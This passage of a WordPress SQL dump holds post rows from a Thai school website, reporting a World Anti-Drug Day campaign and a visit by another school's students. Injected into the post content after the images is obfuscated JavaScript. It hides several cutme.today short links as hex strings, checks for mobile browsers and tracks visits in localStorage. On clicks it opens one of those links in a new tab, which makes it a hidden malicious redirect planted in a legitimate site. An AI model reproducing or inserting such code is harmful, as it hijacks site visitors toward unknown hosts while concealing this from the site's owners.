_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \"วันต่อต้านยาเสพติดโลก','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%a7%e0%b8%b1-2','','','2024-08-01 20:56:05','2024-08-01 13:56:05','',0,'http://pakhaeng.ssk.in.th/?p=444',0,'post','',0),
(445,1,'2024-08-01 20:55:56','2024-08-01 13:55:56','','25-67','','inherit','','closed','','25-67','','','2024-08-01 20:55:56','2024-08-01 13:55:56','',444,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/25-67.png',0,'attachment','image/png',0),
(446,1,'2024-08-01 20:56:04','2024-08-01 13:56:04','<!-- wp:paragraph -->\n<p>วันที่ 26 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันต่อต้านยาเสพติดโลก เพื่อรณรงค์ให้นักเรียนและชุมชน ตระหนักเห็นถึงความสำคัญของการต่อต้านยาเสพติดที่เป็นบ่อนทำลายประเทศชาติและเยาวชน ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และชุมชนบ้านหนองปลาเข็ง และบ้านกอไหล่ นำโดย นางเสน่หา พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา นำขบวนเดินรณรงค์ต่อต้านยาเสพติดในชุมชน โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/25-67-724x1024.png\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \"วันต่อต้านยาเสพติดโลก','','inherit','closed','closed','','444-revision-v1','','','2024-08-01 20:56:04','2024-08-01 13:56:04','',444,'http://pakhaeng.ssk.in.th/?p=446',0,'revision','',0),
(447,1,'2024-08-01 20:57:14','2024-08-01 13:57:14','<!-- wp:paragraph -->\n<p><strong>วันที่ 29 มิถุนายน พ.ศ. 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ให้การต้อนรับนักเรียนโรงเรียนกันทรลักษ์วิทยา ที่มาจัด กิจกรรมเพื่อพัฒนาโรงเรียน พร้อมด้วยนักเรียน ชั้น ป.6 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกันทำความสะอาด ทาสี และวาดภาพ ทางโรงเรียนฯ ขอขอบคุณนักเรียนจากโรงเรียนกันทรลักษ์วิทยา ที่มาจัดกิจกรรมดี ๆ เพื่อน้อง ๆ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มา ณ ในโอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/26-67-724x1024.png\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 